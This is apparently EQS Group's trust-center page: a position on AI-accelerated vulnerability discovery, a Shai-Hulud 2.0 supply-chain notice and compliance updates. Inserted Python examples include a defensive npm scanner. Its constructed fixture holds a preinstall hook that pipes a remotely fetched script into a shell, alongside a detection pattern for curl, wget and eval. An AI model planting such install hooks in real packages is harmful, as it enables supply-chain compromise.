EQS Position on AI-Accelerated Vulnerability Discovery and Zero-Day Risk

EQS Trust Center


EQS Group is a leading international cloud provider in the fields of corporate compliance, investor relations, and sustainability reporting.

EQS Group’s products are pooled in the cloud-based software EQS COCKPIT. This platform ensures the professional handling of compliance workflows in the fields of whistleblower protection and case management, policy management, business approvals, third-party management, insider list management, disclosure obligations, sustainability reporting including automated ESG data collection, management, and filing in compliance with regulations.

In addition, listed companies benefit from a global newswire, investor targeting and contact management, Investor Relation websites, digital reports, and webcasts for efficient and secure investor communications.

EQS Group was founded in 2000 in Munich, Germany. Today, the group employs around 600 professionals and has offices in the world’s key financial markets.

Find out more at https://www.eqs.com/about-eqs/#about


Certifications, attestations, and frameworks:

• ISO/IEC 27001:2022
• ISO/IEC 27017:2015
• ISO/IEC 27018:2019
• ISO/IEC 27001 SoA
• GDPR
• DORA
• EU AI Act
• NIS 2
• SOC 2 Type 2
• TISAX
• NIST CSF
• EcoVadis 2025 - Silver
• ProcessUnity
• CSA STAR
• EU Cloud COC
• CISA: Secure-by-Design Pledge
• CSA Trusted Cloud Provider
• SOC 2 Type 1
• ENS RD311/2022 HIGH
• CSA STAR Attestation

EQS Trust Center Updates

EQS Position on AI-Accelerated Vulnerability Discovery and Zero-Day Risk

General

EQS is closely monitoring the evolution of AI-assisted vulnerability discovery and exploit development, including public reporting around Anthropic’s Claude Mythos Preview and related industry initiatives such as Project Glasswing. We do not treat this as a single-vendor or single-model issue. Our position is that “Mythos-class” capabilities are part of a broader shift: vulnerability discovery, exploit validation, patch-diff analysis, and attack automation are becoming faster, more accessible, and more scalable.

This development reinforces EQS’s existing security direction: controls must become faster, more evidence-based, and more integrated into software development, operations, supplier management, and incident response.

Scope of the Threat

EQS uses the term “Mythos-class” as shorthand for a broader class of AI-assisted vulnerability discovery and exploitation workflows. The risk is not dependent on an attacker having direct access to Anthropic’s Claude Mythos Preview or any other specific frontier model.

Material parts of these capabilities are already available today by combining existing AI models with coding agents, security tools, fuzzing, static analysis, exploit frameworks, vulnerability intelligence, patch-diff analysis, and human operator expertise. Well-orchestrated use of existing models can already accelerate vulnerability discovery, exploit validation, and remediation pressure.

For this reason, EQS treats Mythos as a signal of the direction and speed of change, not as the sole source of the threat. Our security response is model-agnostic and focused on reducing exposure, improving detection and remediation speed, strengthening Secure SDLC controls, and limiting blast radius.

CSA Alignment and Industry Collaboration

EQS aligns its approach with relevant industry guidance, including the Cloud Security Alliance publication The “AI Vulnerability Storm”: Building a “Mythos-ready” Security Program. This guidance reflects the same core assumption used by EQS: AI is changing the speed, scale, and economics of vulnerability discovery, and security programs must adapt beyond traditional patching and vulnerability-counting models.

EQS has been actively engaged in Cloud Security Alliance activities and has participated early in the discussion and definition of practical responses to AI-accelerated vulnerability risk. EQS is also listed in the CSA STAR Registry and holds the CSA Trusted Cloud Provider trustmark, reflecting our ongoing commitment to cloud security transparency, assurance, and community contribution.

This external collaboration complements EQS’s internal security work. We use CSA guidance as one input into our ongoing improvements across Secure SDLC, exposure management, third-party risk, security operations, incident response, and customer transparency.

Vulnerability and Patch Management

EQS maintains vulnerability management processes covering infrastructure, applications, dependencies, cloud services, containers, and supporting systems. Newly disclosed vulnerabilities are assessed using exploitability, exposure, reachability, affected services, affected data, compensating controls, dependency context, and evidence of active exploitation.

For critical vulnerabilities affecting customer-facing services, EQS applies expedited triage, emergency change handling, and prioritized remediation or containment. Where a fix cannot be safely deployed immediately, compensating controls may be applied to reduce exposure and blast radius while remediation proceeds.

EQS is continuously strengthening automated security checks, dependency visibility, software bill of materials coverage, reachability-based prioritization, and AI-assisted review in development workflows.

Vulnerability Prioritization and Use of CVSS

EQS does not rely on CVSS as the primary driver for vulnerability prioritization. CVSS may be considered as one contextual input where available, but it has never been a decisive factor in EQS vulnerability handling and is even less suitable as a standalone prioritization mechanism in the current threat environment.

Many SaaS-specific vulnerabilities do not have a CVE at all. CVEs are typically available for known components or publicly disclosed issues, but not for all application-specific, configuration-specific, or business-logic weaknesses. In addition, the fact that a component has a vulnerability does not automatically determine the actual risk for a service using it. Exposure, reachability, exploitability, compensating controls, and business impact are decisive.

EQS prioritizes vulnerabilities based on practical risk to EQS services and customers, including active exploitation, exploit availability, internet exposure, affected asset criticality, data sensitivity, dependency context, and operational impact. This prioritization can function independently of whether a CVE or CVSS score is available.

This approach also reflects the increasing strain on public vulnerability infrastructure. The CVE and NVD ecosystem is facing record vulnerability volumes, delayed or incomplete enrichment, and changing prioritization models. NIST has stated that CVE submissions increased by 263% between 2020 and 2025 and that NVD will no longer immediately enrich all CVEs or routinely provide separate NIST severity scores where a CVE Numbering Authority has already provided one. FIRST has similarly advised organizations to focus on vulnerabilities that pose the greatest risk to their specific environment, not only those with the highest CVSS scores.

Accordingly, EQS treats CVSS as a useful reference point, not as a substitute for exposure-based, exploitability-based, and business-impact-based security judgment.
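As an added illustration (not EQS's own tooling), here is one way a practical-risk ranking of the kind described above can be expressed: a finding with no CVE or CVSS score at all outranks a higher-CVSS one whose vulnerable code is not reachable, and CVSS only breaks ties.

```python
"""Practical-risk vulnerability ranking (added example, not EQS tooling).

Scores findings on the factors the page names: active exploitation, exploit
availability, internet exposure, reachability, asset criticality, data
sensitivity and compensating controls. CVSS is only a tie-breaker, so a finding
with no CVE or score competes on equal footing. All findings are constructed."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Finding:
    name: str
    cve: Optional[str]          # None for app-, config- or logic-specific issues
    cvss: Optional[float]       # None when no score exists
    actively_exploited: bool    # evidence of exploitation in the wild
    exploit_available: bool     # public PoC or weaponized exploit known
    internet_exposed: bool
    reachable: bool             # vulnerable code path reachable in the service
    asset_criticality: int      # 1 (internal tool) .. 3 (customer-facing core)
    data_sensitivity: int       # 1 (public) .. 3 (personal / confidential)
    compensating_control: bool  # e.g. feature disabled or edge rule in place


def risk_score(f: Finding) -> float:
    """Higher means remediate first; CVSS is deliberately not an input."""
    if not f.reachable:
        base = 1.0              # tracked, but not expedited
    else:
        base = 10.0 if f.actively_exploited else 7.0 if f.exploit_available else 4.0
        if f.internet_exposed:
            base += 3.0
    base *= (f.asset_criticality + f.data_sensitivity) / 2
    if f.compensating_control:
        base *= 0.6             # exposure reduced while remediation proceeds
    return round(base, 2)


def prioritize(findings: List[Finding]) -> List[Finding]:
    """Sort by practical risk; CVSS (0 when absent) only breaks ties."""
    return sorted(findings, key=lambda f: (risk_score(f), f.cvss or 0.0), reverse=True)


# Constructed sample findings; CVE ids are placeholders, not real records.
SAMPLE = [
    Finding("lib-parser RCE", "CVE-0000-0001", 9.8, False, True, True, False, 2, 2, False),
    Finding("case export IDOR", None, None, False, True, True, True, 3, 3, False),
    Finding("framework auth bypass", "CVE-0000-0002", 7.5, True, True, True, True, 3, 2, True),
    Finding("internal admin XSS", "CVE-0000-0003", 5.3, False, True, False, True, 2, 2, False),
]
```

Running `prioritize(SAMPLE)` places the CVSS 9.8 library issue last because it is not reachable, while the CVE-less export flaw ranks first.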

Detection of Emerging Attack Patterns

EQS uses a combination of threat intelligence, vendor advisories, security monitoring, vulnerability feeds, automated tooling, and internal security analysis to identify emerging attack techniques. We explicitly consider AI-enabled attack acceleration in security planning, including higher vulnerability volumes, faster exploit development, and increased pressure on triage and remediation workflows.

Our security strategy is moving from traditional vulnerability counting toward exposure management: prioritizing what is exploitable, reachable, business-critical, or actively targeted.

Protection Against Zero-Day Exploits

No organization can guarantee prevention of all zero-day exploitation. EQS therefore applies layered controls designed to limit the likelihood and impact of unknown vulnerabilities. These include secure configuration baselines, least-privilege access, privileged-access protections, network and service segmentation, logging and monitoring, hardened deployment pipelines, application security testing, dependency controls, and containment procedures.

The goal is to reduce reachable attack surface, limit lateral movement, detect suspicious behavior early, and preserve the ability to contain or recover quickly.

Incident Response and Escalation

EQS maintains incident response processes with defined escalation paths, internal ownership, customer communication procedures, and management involvement for significant security events. For rapidly evolving vulnerability or exploitation scenarios, EQS can activate expedited assessment, containment, remediation, and communication workflows.

Customers are informed through the appropriate contractual and operational channels when a confirmed security issue materially affects the confidentiality, integrity, availability, or risk profile of services provided to them.

Ongoing Security Enhancements

EQS is continuously enhancing its security practices in light of AI-enabled threats. Current focus areas include:

  • AI-aware Secure SDLC controls
  • stronger vulnerability and dependency visibility
  • faster triage and remediation workflows
  • AI-assisted code and security review
  • tabletop exercises for rapid-exploitation and multi-vulnerability scenarios
  • improved security telemetry and evidence capture
  • governance for AI systems, agents, connectors, and automation
  • developer and security-team training for AI-era risks

This work is intended to improve defensive speed and governance quality without disclosing sensitive internal architecture, tooling configuration, or operational playbooks.

Third Parties and Subprocessors

EQS manages third-party and subprocessor risk through due diligence, contractual security expectations, supplier monitoring, compliance reviews, and review of relevant advisories or incidents.

EQS uses multiple sources and tools to monitor third-party risk. Where an increased risk signal is identified for a relevant supplier, EQS receives alerts and assesses the potential impact on services, data, and customers. These signals may include security advisories, vulnerability information, external risk indicators, compliance changes, potential “dark web” reports and data leakages, incident notifications, or other material changes in the supplier’s risk profile.

In addition to ongoing monitoring, EQS performs periodic compliance reviews of relevant suppliers, including an annual review cycle for applicable third parties and subprocessors. Where third-party technology forms part of EQS services, vulnerabilities are assessed according to exposure, exploitability, service impact, and available compensating controls.

EQS expects relevant suppliers to support timely vulnerability handling, security communication, and incident cooperation.

Transparency and Communication

EQS provides security transparency through the Trust Center, contractual documentation, and direct customer communication where appropriate. Public Trust Center materials describe our control approach at a level suitable for customers and auditors. For security reasons, EQS does not publicly disclose detailed detection logic, internal tooling configuration, supplier-specific exposure maps, vulnerability backlogs, or incident playbooks.

EQS will continue to monitor AI-enabled vulnerability discovery and update its security practices as the threat landscape evolves.

Relevant Public References


For security-related questions, customers may open a request against the InfoSec queue on our Support Center or contact EQS Information Security at infosec@eqs.com.

Dr. Marco Ermini
Chief Information Security Officer, EQS Group

TISAX AL3 Labels for EQS location in Denver

Compliance

We’re excited to share that EQS Group’s Denver location has successfully achieved TISAX® Assessment Level 3 (AL3) for the following objectives:

• Data protection (including special categories of personal data)
• Very high availability
• Strict confidentiality

This is the highest assessment level within the TISAX framework and confirms that our site meets very stringent information security requirements expected by partners in the automotive industry. The scope covers all relevant processes and resources related to the collection, storage, and processing of information.

The assessment is valid until September 23, 2028, reinforcing our long-term commitment to maintaining strong security standards and building trust with our customers and partners.
The TISAX decorative assessment document can be accessed here in our Trust Center at https://trust.eqs.com/product/eqsgroup/tisax

Planned Maintenance Notification – Private Cloud Hosting (T-Systems)

Compliance

We would like to inform you about an upcoming migration to a new hosting platform affecting customers using Compliance Cockpit and BKMS System with private cloud hosting at T-Systems.

Schedule & Scope

Saturday, April 18, 10:00 – 12:00 (CEST)

Migration of Data Center and Integrity Line

Impact: During the maintenance window, users may experience short interruptions affecting login, web intake, and the Compliance Cockpit.

Sunday, April 19, 10:00 – 12:00 (CEST)

Migration of BKMS System

Impact: During the maintenance window, users may experience short interruptions affecting login, web intake, and the BKMS System.

Additional Information

We are working to minimise any disruption and ensure a smooth transition to the new hosting environment. Services will be fully restored once the maintenance windows are completed.

If you have any questions, please contact our support team.

Thank you for your understanding.

Shai-Hulud 2.0 Supply Chain Attack – no impact to EQS

Vulnerabilities

Popular projects from Zapier, ENS Domains, PostHog, and Postman were temporarily "trojanized" by threat actors, leading to GitHub repos populated with stolen victim data. Some of these packages are widely used by developers.

Newly compromised packages continue to surface. The number of identified compromised packages is steadily growing, currently at circa 700. The blast radius is already massive – 25,000+ malicious repos across circa 500 GitHub users. For more technical information, kindly see this post from Wiz: https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack

What has EQS done?

First, EQS does not use GitHub directly. EQS hosts its source code on private, internal repositories. Packages borrowed from public repositories are tightly scanned with multiple tools and vetted before inclusion and use.

To identify this potential threat, EQS has built a dedicated scanner that identifies known compromised packages and checks dependencies against them. The scanner also parses all installation actions from packages, since exploitation happens during installation. EQS has simulated how installation scripts work to identify signs of malicious traffic and exploitation.

Furthermore, potential secret exposures coming from the CI/CD pipeline have been assessed. All variables in the CI/CD pipelines have been inspected to detect cloud credentials, Kubernetes registry credentials, SSH keys, and so on.

Finally, we have used our CNAPP tool to scan for the presence of vulnerable packages directly on our hosting environments (both QA and production).
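As an added example (not the EQS scanner itself), a minimal check in the same spirit: it matches lockfile entries against a constructed compromised-package list and surfaces lifecycle scripts for review, using the hasInstallScript marker that npm writes into package-lock.json; the package names, versions and manifests are all constructed placeholders.

```python
"""Dependency scanner in the spirit of the Shai-Hulud checks described above
(added example, not EQS's internal scanner). It reads an npm package-lock.json,
flags packages matching a known-compromised name/version list, and flags
packages declaring lifecycle scripts, since install-time execution is where
this attack runs. All sample data and package names below are constructed."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Triage heuristic only: an install script that fetches or evaluates remote
# content deserves manual review; a match is not proof of compromise.
REVIEW_PATTERNS = re.compile(r"https?://|\bcurl\b|\bwget\b|\beval\(", re.I)

# Constructed indicator list (placeholder names): package -> compromised versions.
COMPROMISED = {
    "example-sdk": {"2.4.1"},
    "example-cli-helper": {"1.0.7", "1.0.8"},
}

# Constructed package-lock.json content; hasInstallScript is npm's own marker.
SAMPLE_LOCKFILE = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"example-sdk": "^2.4.0"}},
        "node_modules/example-sdk": {"version": "2.4.1", "hasInstallScript": True},
        "node_modules/left-utils": {"version": "3.1.0"},
        "node_modules/native-addon": {"version": "0.9.2", "hasInstallScript": True},
    },
})

# Constructed manifests, as read from node_modules/<name>/package.json.
SAMPLE_MANIFESTS = {
    "example-sdk": {"scripts": {"preinstall": "curl -s https://example.invalid/setup.sh | sh"}},
    "native-addon": {"scripts": {"install": "node-gyp rebuild"}},
}


def scan_lockfile(lock_json: str, manifests: dict) -> list:
    """Return findings as (package, version, reason) tuples."""
    findings = []
    for path, meta in json.loads(lock_json).get("packages", {}).items():
        if not path.startswith("node_modules/"):
            continue                                 # skip the root project entry
        name = path.rsplit("node_modules/", 1)[1]    # handles nested and scoped paths
        version = meta.get("version", "")
        if version in COMPROMISED.get(name, set()):
            findings.append((name, version, "known-compromised version"))
        if meta.get("hasInstallScript"):
            scripts = manifests.get(name, {}).get("scripts", {})
            for hook in LIFECYCLE_HOOKS:
                cmd = scripts.get(hook)
                if cmd is not None:
                    verdict = "needs review" if REVIEW_PATTERNS.search(cmd) else "present"
                    findings.append((name, version, f"{hook} script {verdict}"))
    return findings
```

Calling `scan_lockfile(SAMPLE_LOCKFILE, SAMPLE_MANIFESTS)` reports the compromised version, the preinstall script that fetches remote content, and the benign native build step, while the package without install scripts produces nothing.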

Results

EQS has detected no signs of compromise or vulnerability to this attack.

For further information, don't hesitate to contact infosec@eqs.com.

EQS Group expands the scope of its ISO/IEC 27001, 27017, and 27018 certification

Compliance

In May, EQS Group completed its ISO/IEC 27001/27017/27018 re-certification. After two successful onsite audits in Denver, Colorado, U.S.A., in September and Neuilly-sur-Seine (Paris), France, in October, EQS Group is delighted to announce that both locations are now part of the certification scope and listed in the certificate.

EQS Group maintains strict security measures as part of its Information Security Management System at all of its offices worldwide. By adding these two major offices to the certification scope and therefore subjecting them to regular external surveillance audits, EQS Group further enhances transparency and strengthens trust with customers internationally, reinforcing its pledge to secure and reliable handling of sensitive data for its 14,000+ customers.

Interested parties can access the ISO/IEC certificate in English and German at this URL: https://trust.eqs.com/product/EQS+Group/iso27001
